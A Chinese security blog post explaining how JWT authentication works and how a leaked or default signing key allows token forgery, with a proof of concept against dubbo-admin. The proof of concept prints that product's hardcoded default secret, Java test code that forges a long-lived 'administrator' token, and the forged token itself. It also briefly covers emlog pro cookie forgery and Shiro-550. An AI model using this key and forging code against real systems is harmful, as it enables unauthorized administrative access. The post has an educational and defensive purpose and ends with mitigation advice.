JSON Web Token 默认密钥 身份验证安全性分析 dubbo-admin JWT硬编码身份验证绕过

引言

在web开发中,对于用户认证的问题,有很多的解决方案。其中传统的认证方式:基于session的用户身份验证便是可采用的一种。

基于session的用户身份验证验证过程: 用户在用进行验证之后,服务器保存用户信息返回sessionid,客户端携带sessionid可向服务器确认自己的身份。 这种认证方式也有着诸多缺点: 用户凭证数据存储在服务端,随着用户的增多,服务端压力增大;在分布式架构下用户凭证需要在服务器与服务器之间交换进行session的同步,否则只能用户挨个对服务器进行认证,这给服务器或者用户带来不便,可扩展性不强。

而基于JSON Web Token 的认证方式则完全可以解决这一问题,它利用了加密技术对用户的信息做签名认证,这使得服务端只需采用相同的算法密钥对,无需进行用户凭证信息的交换就可以完成用户的认证。

基于JSON Web Token 的用户身份验证验证过程: 采用json数据的格式分三个部分进行base64编码,header:声明所使用的算法,payload:存放用户关键信息 signatue:对header与payload进行算法签名, 将这三个部分base64编码用用逗号作为分隔,作为单独的header头返回给用户。 那么当用户需携带着jwt token向后端验证自己的身份时,如果通过了签名认证算法,就可以引用用户的关键信息来证明的用户的相应身份。

JWTtoken应用示例
import com.auth0.jwt.JWT;
import com.auth0.jwt.JWTVerifier;
import com.auth0.jwt.algorithms.Algorithm;
import com.auth0.jwt.exceptions.JWTDecodeException;
import com.auth0.jwt.exceptions.JWTVerificationException;
import com.auth0.jwt.interfaces.DecodedJWT;
import jdk.internal.dynalink.beans.StaticClass;
​
import java.util.Date;
public class JwtTokenGenerator {static String secretKey = "secretKey123";//密钥static String issuer = "cn";public static String generateToken(String userId, String username) {Date now = new Date();Date expiryDate = new Date(now.getTime() + 3600000); // 设置过期时间为1个小时后Algorithm algorithm = Algorithm.HMAC256(secretKey);//设置算法及密钥String token = JWT.create().withIssuer(issuer)//发布人.withClaim("userId", userId)//数据 "usrid:xxxxx".withClaim("username",username).withIssuedAt(now)//发布时间.withExpiresAt(expiryDate)//到期时间.sign(algorithm);//return token;}
​
​public static void main(String[] args) {String token = generateToken("2233","admin");System.out.println("生成JWTtoken:"+token);
​// 验证Tokenboolean isValid = verifyToken(token);System.out.println("Token is valid: " + isValid);
​// 解析Token获取数据UserInfo userInfo  = getUserInfoFromToken(token);
​if (userInfo != null) {System.out.println("User ID: " + userInfo.getUserId());System.out.println("Username: " + userInfo.getUsername());} else {System.out.println("Invalid token or decoding error.");}
​}// 验证Tokenpublic static boolean verifyToken(String token) {try {Algorithm algorithm = Algorithm.HMAC256(secretKey);JWTVerifier verifier = JWT.require(algorithm).withIssuer(issuer).build(); // Reusable verifier instanceDecodedJWT jwt = verifier.verify(token);// 验证通过return true;} catch (JWTVerificationException exception) {// 验证失败return false;}}
​// 解析Token获取其中的数据public static UserInfo getUserInfoFromToken(String token) {try {Algorithm algorithm = Algorithm.HMAC256(secretKey);JWTVerifier verifier = JWT.require(algorithm).build();DecodedJWT jwt = verifier.verify(token);
​String userId = jwt.getClaim("userId").asString();String username = jwt.getClaim("username").asString();
​return new UserInfo(userId, username); // Assuming UserInfo class holds userId and username} catch (JWTDecodeException | IllegalArgumentException exception) {// Invalid token or decoding exceptionreturn null;}}
}

运行结果

生成JWTtoken:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJjbiIsImV4cCI6MTcyMTgyMzc4MiwidXNlcklkIjoiMjIzMyIsImlhdCI6MTcyMTgyMDE4MiwidXNlcm5hbWUiOiJhZG1pbiJ9.PvLJgRpcVa0sTimuyIHA6yBbuu9qFW4YspdUfKNGctg Token is valid: true User ID: 2233 Username: admin

这是base64的解码

{"typ":"JWT","alg":"HS256"}.{"iss":"cn","exp":1721823782,"userId":"2233","iat":1721820182,"username":"admin"}.>òɁ\U­,N)®ÈÀë [ºïjn²—T|£FrØ

内部逻辑调试

调试一下 看一下逻辑

JWTCreator内部静态类Builder#sign方法 向payloadClaims放入用户信息等其他信息(本次测试放入的是username与userid)

JWTCreator内部静态类Builder#sign方法 向headerClaims放入 alg与typ ,声明算法类型

JWT的构造方法

JWTCreator 生成相应headerClaims与payloadClaims的headerJson与payloadJson

private JWTCreator(Algorithm algorithm, Map<String, Object> headerClaims, Map<String, Object> payloadClaims) throws JWTCreationException {this.algorithm = algorithm;
​try {this.headerJson = mapper.writeValueAsString(headerClaims);this.payloadJson = mapper.writeValueAsString(new ClaimsHolder(payloadClaims));} catch (JsonProcessingException var5) {JsonProcessingException e = var5;throw new JWTCreationException("Some of the Claims couldn't be converted to a valid JSON format.", e);}
}

 签名方法 algorithm会对headerJson和payloadJson进行签名,最后三个部分都返回base64编码字符串

private String sign() throws SignatureGenerationException {String header = Base64.getUrlEncoder().withoutPadding().encodeToString(this.headerJson.getBytes(StandardCharsets.UTF_8));String payload = Base64.getUrlEncoder().withoutPadding().encodeToString(this.payloadJson.getBytes(StandardCharsets.UTF_8));byte[] signatureBytes = this.algorithm.sign(header.getBytes(StandardCharsets.UTF_8), payload.getBytes(StandardCharsets.UTF_8));String signature = Base64.getUrlEncoder().withoutPadding().encodeToString(signatureBytes);return String.format("%s.%s.%s", header, payload, signature);
}

最终是完成JWTtoken的生成返回给用户

 

思考这个机制存在的问题 !
1.修改payloadJson信息伪造token

伪造用户 3344 root 生成base64编码

伪造用户token

ForgeryToken:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJjbiIsImV4cCI6MTcyMTgyMzc4MiwidXNlcklkIjoiMzM0NCIsImlhdCI6MTcyMTgyMDE4MiwidXNlcm5hbWUiOiJyb290In0=.PvLJgRpcVa0sTimuyIHA6yBbuu9qFW4YspdUfKNGctg

经过测试在进行verify签名认证时,伪造的token会抛出异常。当然也有那种不做verify签名直接取用户的信息就能教你挖src的文章,这种就属于后端完全没有校验签名。

2.修改headerJson信息伪造token

看过一些文章尤其是一些ctf的题,有讲解修改headerJson可能会改变签名算法,比如改成公私钥算法,将公钥放到headerJson,那么自己用私钥做的签名公钥自然而然可以进行解钥认证,有些ctf题甚至在headerJson把密钥信息泄露出来。从技术上来说这些的确可以实现,jwt 的headerJson 也是为了不用集群多用户的各种需求设计了很多功能字段,它们在正确的使用下是可以做到完全安全的。 ​ 本示例中Algorithm对象的生成是固定的,没有因前端传来的值而相应做出改变,没有对headerJson进行进一步判断处理。所以本示例中你想拿headerJson去做一些文章是没有结果的。

这点可以参考JWT认证攻击详解总结 - 渗透测试中心 - 博客园

3.密钥泄露或者系统默认密钥

 

假如我们的密钥泄露了,那我们就可以正常的程序生成正常的jwt token 完成verify签名

下面是我们在得知secretKey的情况下伪造用户 3344 root

生成程序

    public static String generateForgeryToken() {Date now = new Date();Date expiryDate = new Date(now.getTime() + 999999999); // 设置过期时间为无限期Algorithm algorithm = Algorithm.HMAC256("secretKey123");//密钥泄露String ForgeryToken = JWT.create().withIssuer(issuer)//发布人.withClaim("userId", "3344")//数据 伪造.withClaim("username","root")//数据 伪造.withIssuedAt(now)//发布时间.withExpiresAt(expiryDate)//.sign(algorithm);//return ForgeryToken;}

生成伪造token

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJjbiIsImV4cCI6MTcyMjkwODQ3NSwidXNlcklkIjoiMzM0NCIsImlhdCI6MTcyMTkwODQ3NSwidXNlcm5hbWUiOiJyb290In0.Ur3gXKTKV9wYnHnegHdGMxAVPLwFxcRHx_vO9EmrR7Q

用程序验证

成功伪造了用户 334 root 这样程序就会执行后面的操作,达到未授权访问的效果

实战dubbo-admin JWT硬编码身份验证绕过

 

硬编码

用户登录逻辑

org/apache/dubbo/admin/controller/UserController.java#login()

  跟入generateToken

这里我们重点关注前面所使用的secret,找到它使用的密钥

 

 

 我们可以在本地测试一下生成token的函数 与验证token的函数

伪造用户administrator 将过期时间调到几百年之后。

 

测试代码

@Test
public void ForgeryTokentest() {Map<String, Object> claims = new HashMap<>(1);claims.put("sub", "administrator");String ForgeryToken = Jwts.builder().setClaims(claims).setExpiration(new Date(System.currentTimeMillis() + 9999999999999999l)).setIssuedAt(new Date(System.currentTimeMillis())).signWith(defaultAlgorithm, "86295dd0c4ef69a1036b0b0c15158d77").compact();System.out.println(ForgeryToken);

生成的伪造token

eyJhbGciOiJIUzUxMiJ9.eyJleHAiOjEwMDAxNzIxOTkzMTQwLCJzdWIiOiJhZG1pbmlzdHJhdG9yIiwiaWF0IjoxNzIxOTkzMTQwfQ.UsUNLgmLq9wRbcPR_ERM7X-Bw6q3P6MrMBR6QilZLhbDHC59BTw3FBCWzORjUt_tuAWPevxmG2YH8JtPe6EGUw
验证用户token逻辑

web接口进入拦截器

 进入authentication认证方法

authentication取出header头中Authorization的值将它传入工具jwtTokenUtil类的canTokenBeExpirarion方法

 

canTokenBeExpirarion使用了jwt的机制对用户token进行了验证。 根据代码逻辑,我们只需用canTokenBeExpiration方法用验证的我们伪造的token即可证明漏洞。

且通过调试,证明这个token时间是非常的长 

 

测试代码

    String secret = "86295dd0c4ef69a1036b0b0c15158d77";@Testpublic void verifyTokentest() {
/*        JwtTokenUtil jwtTokenUtil = SpringBeanUtils.getBean(JwtTokenUtil.class);Boolean isValid = jwtTokenUtil.canTokenBeExpiration("eyJhbGciOiJIUzUxMiJ9.eyJleHAiOjE3MjE5MTA4MzIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJpYXQiOjE3MjE5MDk4MzJ9.qO__fIG1aFImGpZ4qajUuG8w9kcH6l6FgbDsDAEC-9ftLePDsREWJzodMcKpn7sgbqdDhIQ5MxuTSw40q34McA");System.out.println("Token is valid: " + isValid);*/Claims claims;try {claims = Jwts.parser().setSigningKey(secret).parseClaimsJws("eyJhbGciOiJIUzUxMiJ9.eyJleHAiOjEwMDAxNzIxOTkzMTQwLCJzdWIiOiJhZG1pbmlzdHJhdG9yIiwiaWF0IjoxNzIxOTkzMTQwfQ.UsUNLgmLq9wRbcPR_ERM7X-Bw6q3P6MrMBR6QilZLhbDHC59BTw3FBCWzORjUt_tuAWPevxmG2YH8JtPe6EGUw").getBody();final Date exp = claims.getExpiration();if (exp.before(new Date(System.currentTimeMillis()))) {
​System.out.println("token验证过期");}System.out.println("token验证成功");} catch (Exception e) {System.out.println("token验证发生异常");e.printStackTrace();
扩展 emlog pro 版本 2.3.4 存在会话(AuthCookie)持久性和任何用户登录漏洞

这个系统中setAuthCookie的代码逻辑如下

这段逻辑与jwt生成token的原理非常类似

使用$user_login 和 $expiration 作为生成key, 之后在将key 与 $user_login 和 $expiration 作为种子生成用与签名的hash

同样的问题是如果AUTH_KEY 是默认的或者泄露了,那么它就会造成jwt一样的问题。

在知道密钥的情况下,我们只需用的同样的代码流程,改变用户信息,改变过期时间即可有一个合法的且永不过期的用户token

参考:

https://github.com/ssteveez/emlog/blob/main/emlog%20pro%20version%202.3.4%20has%20session(AuthCookie)%20persistence%20and%20any%20user%20login%20vulnerability.md 

扩展 Shiro 550 硬编码问题

Shiro 550本质上就是硬编码的问题。Shiro 密钥在出厂的时候写死在了代码中,这也就导致了系统变相的密钥泄露,而又因为shiro验证用户cookie的机制有了反序列化的这一动作。这就使得反序列化漏洞在这一场景中有了用武之地。讨论Shiro 不出网,绕过等问题,本质上就是讨论Shiro 可以进行哪些反序列化操作的问题。

参考JAVA安全之Shrio550-721漏洞原理及复现_shiro550和shiro721的区别-CSDN博客

总结

虽然JWT密钥面临着可能被泄露的问题,但这并不代表着它不足够安全。除了使用随机密钥的方式启动服务外,我们还可以结合传统的方法来进行改造,那就是采用redis缓存技术,将用户的token值作为value在redis存储备份,再将相应的key传回给用户,用户只需传递key值就能进行认证,各个服务器也都能够取出来对应key的value值,去验证用户token是否合法,这样也避免了密钥泄露的问题!

 

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/79694.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

STM32GPIO输出实战-LED模板

STM32GPIO输出实战-LED模板

STM32GPIO输出实战-LED模板 一&#xff0c;LED控制原理1&#xff0c;LED控制时GPIO的配置2&#xff0c;LED连接方式3&#xff0c;使用HAL库控制LED的常用函数&#xff1a; 二&#xff0c;任意控制LED模板1&#xff0c;Led底层2&#xff0c;代码详细解析 三&#xff0c;实用技巧…
阅读更多...
第二十七届华东杯数学建模A 题 跳台滑雪问题 完整思路模型及代码

第二十七届华东杯数学建模A 题 跳台滑雪问题 完整思路模型及代码

题目背景 跳台滑雪起源于 19 世纪&#xff0c;是冬季运动会的传统竞技项目。今年亚洲冬季运动会在我国 哈尔滨举行&#xff0c;跳台滑雪项目吸引了包括中国在内的亚洲各国运动健儿踊跃参加&#xff0c;我国运动员取得了优异的成绩。 跳台滑雪融合了速度、力量与精确控制&…
阅读更多...
Python之学习笔记(六)

Python之学习笔记(六)

文章目录 1. 字典&#xff08;Dictionary&#xff09;2. 集合&#xff08;Set&#xff09;3. 字典 vs 集合4. 应用场景5. 注意事项 Python中的字典&#xff08; dict&#xff09;和集合&#xff08; set&#xff09;是两种高效且常用的数据结构&#xff0c;适用于不同的场景。…
阅读更多...
缓存与数据库的高效读写流程解析

缓存与数据库的高效读写流程解析

目录 前言1 读取数据的流程1.1 检查缓存是否命中1.2 从数据库读取数据1.3 更新缓存1.4 返回数据 2 写入数据的流程2.1 更新数据库2.2 更新或删除缓存2.3 缓存失效 3 缓存与数据库的一致性问题3.1 写穿&#xff08;Write-through&#xff09;策略3.2 写回&#xff08;Write-back…
阅读更多...
PowerShell 备份 Windows10/11 还原计算机驱动程序SOP

PowerShell 备份 Windows10/11 还原计算机驱动程序SOP

一、现在计算机C目录下创建一个新的文件夹名称为 driverbackup 二、打开cmd 以管理员身份执行 dism /online /export-driver /destination: C:\driverbackup 在正常情况下&#xff0c;Windows 10会自动检测您的设备所需的驱动程序&#xff0c;并将其安装到您的PC上。 但是&am…
阅读更多...
自监督学习(Self-supervised Learning)李宏毅

自监督学习(Self-supervised Learning)李宏毅

目录 Self-supervised Learning简介&#xff1a; BERT : How to use BERT case1&#xff1a;sequence to class 语言积极性OR消极性判断 case2&#xff1a;sequence to sequence句子中的词语词性标注 case3&#xff1a;sequence2 to class两个句子是不是一个为前提一个为…
阅读更多...
Python基于Django的全国二手房可视化分析系统【附源码】

Python基于Django的全国二手房可视化分析系统【附源码】

博主介绍&#xff1a;✌Java老徐、7年大厂程序员经历。全网粉丝12w、csdn博客专家、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域和毕业项目实战✌ &#x1f345;文末获取源码联系&#x1f345; &#x1f447;&#x1f3fb; 精彩专栏推荐订阅&#x1f447;&…
阅读更多...
解决 3D Gaussian Splatting 中 SIBR 可视化组件报错 uv_mesh.vert 缺失问题【2025最新版!】

解决 3D Gaussian Splatting 中 SIBR 可视化组件报错 uv_mesh.vert 缺失问题【2025最新版!】

一、&#x1f4cc; 引言 在使用 3D Gaussian Splatting&#xff08;3DGS&#xff09;进行三维重建和可视化的过程&#xff0c;SIBR_gaussianViewer_app 是一款官方推荐的本地可视化工具&#xff0c;允许我们在 GPU 上实时浏览重建结果。然而&#xff0c;许多用户在启动该工具时…
阅读更多...
shell_plus

shell_plus

python manage.py shell_plus 是由 django-extensions 提供的一个增强版的 Django shell&#xff0c;它自动导入你的所有模型和其他一些便捷功能&#xff0c;使得交互式开发更加方便。 如果你遇到配置或运行问题&#xff0c;特别是与 RQ_SHOW_ADMIN_LINK 相关的 ImproperlyCon…
阅读更多...
文章记单词 | 第62篇(六级)

文章记单词 | 第62篇(六级)

一&#xff0c;单词释义 noon [nuːn] n. 中午&#xff0c;正午clothes [kləʊz] n. 衣服&#xff0c;衣物reward [rɪˈwɔːd] n. 报酬&#xff0c;奖赏&#xff1b;vt. 奖励&#xff0c;奖赏newly [ˈnjuːli] adv. 最近&#xff0c;新近&#xff1b;以新的方式premier [ˈ…
阅读更多...
Linux watch 命令使用详解

Linux watch 命令使用详解

简介 watch 命令会以固定间隔&#xff08;默认每 2 秒&#xff09;重复运行给定命令&#xff0c;并在终端上显示其输出。它非常适合监控不断变化的输出&#xff0c;例如磁盘使用情况、内存使用情况、文件更改、服务状态等。 基础语法 watch [options] command常用选项 -n, -…
阅读更多...
C++类_成员函数指针

C++类_成员函数指针

在 C11 里&#xff0c;成员函数指针是一种特殊的指针&#xff0c;它指向类的成员函数。下面详细介绍成员函数指针的定义、使用及注意事项。 定义 成员函数指针的定义格式如下&#xff1a; 返回类型 (类名::*指针名)(参数列表);例如&#xff1a; class MyClass { public:voi…
阅读更多...
qmt下载的数据放在了哪里了?

qmt下载的数据放在了哪里了?

#qmt获取日线数据 from xtquant import xtdata # 设置股票代码列表和时间范围 stock_list xtdata.get_stock_list_in_sector(沪深A股) # print("获取到的股票列表&#xff1a;", stock_list,len(stock_list)) start_time 20240501 end_time 20250501# 下载多只股票…
阅读更多...
深入浅出数据库管理系统

深入浅出数据库管理系统

数据库管理系统&#xff1a;数字世界的“隐形管家” ——从数据杂乱到井井有条的秘密武器 一、数据库管理系统&#xff1a;数字世界的“隐形管家” 你有没有想过&#xff0c;为什么我们在电商平台购物时&#xff0c;商品库存能实时更新&#xff1f;为什么银行转账时&#xff…
阅读更多...
关于Docker拉取镜像超时/无法访问镜像仓库解决方案

关于Docker拉取镜像超时/无法访问镜像仓库解决方案

文章目录 关于Docker拉取镜像超时/无法访问镜像仓库解决方案卸载原先安装的Docker及相关配置使用代理后无法拉取镜像解决方案验证代理连通性安装 Docker 最新版配置 Docker Daemon HTTP 代理重启验证与拉取镜像 不使用代理解决方案安装 Docker 最新版配置阿里云容器镜像加速 关…
阅读更多...
Docker Compose:服务编排:批量管理多个容器

Docker Compose:服务编排:批量管理多个容器

通过docker compose进行容器批量管理&#xff1a;一次性启动四个容器&#xff08;nginx&#xff0c;tomcat&#xff0c;redis&#xff0c;mysql&#xff09; &#xff08;1&#xff09; 创建docker-compose目录 mkdir ~/docker-compose cd ~/docker-compose &#xff08;2&…
阅读更多...
Java面试大纲(以及常见面试问答)

Java面试大纲(以及常见面试问答)

&#x1f91f;致敬读者 &#x1f7e9;感谢阅读&#x1f7e6;笑口常开&#x1f7ea;生日快乐⬛早点睡觉 &#x1f4d8;博主相关 &#x1f7e7;博主信息&#x1f7e8;博客首页&#x1f7eb;专栏推荐&#x1f7e5;活动信息 文章目录 Java面试大纲&#xff08;以及常见面试问答&…
阅读更多...
2025年- H25-Lc133- 104. 二叉树的最大深度(树)---java版

2025年- H25-Lc133- 104. 二叉树的最大深度(树)---java版

1.题目描述 2.思路 返回左右子树中&#xff0c;最高高度的子树,高度从0开始计数。 3.代码实现 class TreeNode {int val;TreeNode left;TreeNode right;TreeNode() {}TreeNode(int val) { this.val val; }TreeNode(int val, TreeNode left, TreeNode right) {this.val val;…
阅读更多...
个性化推荐:大数据引领电子商务精准营销新时代

个性化推荐:大数据引领电子商务精准营销新时代

个性化推荐:大数据引领电子商务精准营销新时代 引言 在电子商务的时代,个性化推荐系统已经成为提升用户体验、增强平台竞争力的重要技术。随着大数据技术的迅猛发展,传统的推荐方法已经无法满足用户日益增长的需求。为了精准地把握用户兴趣和消费倾向,商家们依赖大数据分析…
阅读更多...
VulnHub-OSCP靶机

VulnHub-OSCP靶机

前言&#xff1a;由于这台机器过于简单&#xff0c;所以我会尽量细化和介绍每个步骤以及涉及到的知识点&#xff0c;让正在打入门机器的你不在迷茫和硬化的操作&#xff0c;理解并熟悉每条命令以及参数的含义&#xff0c;以及把前期带给我们的信息进行快速筛选&#xff0c;有利…
阅读更多...
最新文章

Copyright @ 2022~2023